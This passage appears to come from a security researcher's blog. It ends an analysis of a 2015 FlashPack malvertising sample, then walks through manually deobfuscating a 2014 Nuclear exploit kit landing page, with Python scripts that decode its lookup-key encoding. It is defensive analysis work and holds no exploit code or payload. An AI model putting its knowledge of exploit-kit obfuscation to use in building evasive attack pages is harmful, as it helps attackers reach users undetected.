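    return hex2bin(decodeurl(images(pixel_rows))).split("&")
```

With the real alphabets and pixel data from the sample, decode_image() would return the two pieces discussed below.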

FlashPack malvertising Feb 2015 sample - part of decoded PNG file content

'The operation was a complete success!' (c) Dr. Nick Riviera(The Simpsons)

Our assumption was that at the end of the chained function calls we will have a string that can be broken in 2 at '&' character resulting in a URL and something else. Indeed we've got a URL and this something else turned out to be a part of the exploit shellcode.

That's all for now, folks!

Credits

@kafeine - invaluable intelligence sharing
@TimoHirvonen - tremendous help with reverse engineering SWF files

Tools Used

Sulo - https://github.com/F-Secure/Sulo
JPEXS Free Flash Decompiler - https://www.free-decompiler.com/flash/
Kahu Security Converter Tool - http://www.kahusecurity.com/tools/
JetBrains PyCharm - https://www.jetbrains.com/pycharm/
Notepad++ - http://notepad-plus-plus.org/


Tuesday, 23 September 2014

Deobfuscation tips: Nuclear EK landing page

DISCLAIMER: There isn't a single way to deal with obfuscated data/code. There are many automated and semi-automated tools available to help you with that. In this post though I'll be using none. The aim here is to walk through some code deobfuscation manually. This is not a comprehensive Nuclear EK landing page analysis. Only bits related to data/code obfuscation are covered.

NOTE: The Exploit Kit sample used in this post was captured in September 2014. Given the ever changing nature of EKs, what is described below might not be applicable to newer variants.

'Nuclear launch detected'

I'll be using a Nuclear EK landing page sample here. Note the huge blob of numbers stored in the 'G4Ah' variable and the string stored in the 'qjv' variable. The string serves as a lookup key, and the blob is actually a sequence of 2-digit numbers, each giving the position of a character in the lookup key. The JavaScript on the landing page does quite a simple job - it splits the blob into 2-digit chunks, loops through the chunks to find the corresponding character in the lookup key and adds the found character to a string. This might sound a bit confusing, so let's translate it into a Python script to better understand it.

lookupKey = "LOOKUP_KEY_GOES_HERE"
encodedString = "NUMBERS_BLOB_GOES_HERE"
# Split the blob into 2-digit chunks; list() is needed on Python 3, where map() is lazy
listOfValues = list(map(''.join, zip(*[iter(encodedString)]*2)))
decodedString = ""

for value in listOfValues:
    element = int(value)
    # Values of 10 and above are shifted by 2 to compensate for the escape '\' characters in the key
    if element >= 10:
        element -= 2
    decodedString += lookupKey[element]

print(decodedString)

You'll notice an 'if' condition in the lookup loop - for any value of 10 or greater, subtract 2 from it and then perform the lookup. This is done to compensate for the escape '\' characters in the lookup key. I'm not entirely sure why '10', but I assume the code logic that generates the key does not place characters that require escaping in the first 10 character positions of the key.

Before we can run the script we need to put the values into 'lookupKey' and 'encodedString'. While the value for 'encodedString' is hard to miss in the landing page code, the value for 'lookupKey' might be challenging to find. From my personal experience with Nuclear EK landings, I found that the character positions in the key are random, but its size is always 95 characters. The simplest, but not always reliable, way to find the lookup key is to search for a variable assigned a long string value. If this method fails you'll have to follow the JavaScript code to find it.
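
The 'search for a long string' shortcut can be scripted too. The sketch below is only a heuristic: the function name and the 90-character threshold are arbitrary choices for illustration, and all-digit strings are skipped so that the numbers blob itself is not reported as a key candidate.

```python
import re

# Quoted JavaScript string literal, allowing backslash-escaped characters inside
STRING_LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1)[^\\])*)\1""")


def candidate_keys(javascript, min_length=90):
    """Return long string literals that are not purely numeric, longest first."""
    candidates = []
    for match in STRING_LITERAL.finditer(javascript):
        body = match.group(2)
        if len(body) >= min_length and not body.isdigit():
            candidates.append(body)
    return sorted(candidates, key=len, reverse=True)
```

Running candidate_keys() over the landing page source should narrow the search down to a handful of strings, which still need to be checked by hand against the decoding loop.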

Now, if we use the corresponding values from our landing page sample and run the script, we get the following output.

Another KISS approach to data obfuscation. Happy deobfuscation!